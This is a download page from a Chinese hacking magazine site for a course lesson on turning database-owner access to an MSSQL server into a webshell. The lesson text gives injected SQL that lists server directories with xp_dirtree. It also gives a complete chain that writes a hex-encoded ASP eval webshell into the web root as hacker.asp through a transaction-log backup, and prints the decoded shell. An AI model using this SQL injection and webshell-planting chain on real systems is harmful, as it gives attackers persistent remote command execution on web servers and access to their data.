《黑客防线》↑在攻与防的对立统一中寻求突破!2001年创刊的黑客技术专业刊物!

设为首页
收藏本站
联系我们
网站导航


软件下载 - 专题资源 - VIP脚本入侵系列课程(新) - 浏览软件 - [第10课]db权限下的备份获取webshell实例
[第10课]db权限下的备份获取webshell实例
授权类型:
运行环境:
软件分类: VIP脚本入侵系列课程(新)
文件大小: 42.09MB
星级评定:
官方网站: http://
发 布 人:
发布时间: 2008-3-11 10:34:41
下载权限:
下载次数: 834 人次
下载计费: 0 分, 0 金币 链接报错 收藏本页
下载地址: 下载地址1
特别说明: 1.本站非VIP资料均从网上收集,仅供网络安全爱好者学习、研究所用,请勿用于非法用途,违者责任自负。
2.本站VIP资料专为VIP会员提供,至2008年2月1日起,所有VIP软件、课程均设置有压缩包密码,此密码一月一更新。获取当月VIP压缩密码请到“VIP论坛”、“服务版”查看置顶贴,或在登陆VIP会员帐户后,点击如下连接进入:VIP资料每月密码公布
3.本站VIP资料专署于所有VIP会员共同所有,任何个人、团体共享、发布、盗连均视为侵权,一经发现,严惩不怠!
黑客防线vip入侵
第十讲:db权限下的备份获取webshell实例

学习目的
学会db权限的一些可用的扩展
学会db权限备份获取webshell
学会db权限查看磁盘文件

原理概述
Db权限下的列目录
Db权限下的log备份和差异备份

Db权限下的列目录
--得到硬盘文件信息             //dbo public --参数说明:目录名,目录深度,是否显示文件 //读取磁盘目录和文件 execute master..xp_dirtree 'c:' //列出所有c:\文件和目录,子目录 execute master..xp_dirtree 'c:',1 //只列c:\文件夹 execute master..xp_dirtree 'c:',1,1 //列c:\文件夹加文件

Db权限下的备份
;alter database dweb set RECOVERY FULL-- ;create table cmd (a image)-- ;backup log dweb to disk = ‘c:\Sammy‘ with init-- ;insert into cmd (a) values (‘0x3C256576616C20726571756573742822612229253E‘)-- ;backup log dweb to disk = ‘d:\www\hacker.asp‘–
                                                                                                      
这里dweb是数据库名
Cmd是表名
<%eval request(“a”)%> = 0x3C256576616C20726571756573742822612229253E

我们直接用工具来做测试
评论作者:
电子邮件:
评论内容:
投票评价:
验 证 码:
图片包含4个随机字符,点击刷新
请输入上面图片中的随机字符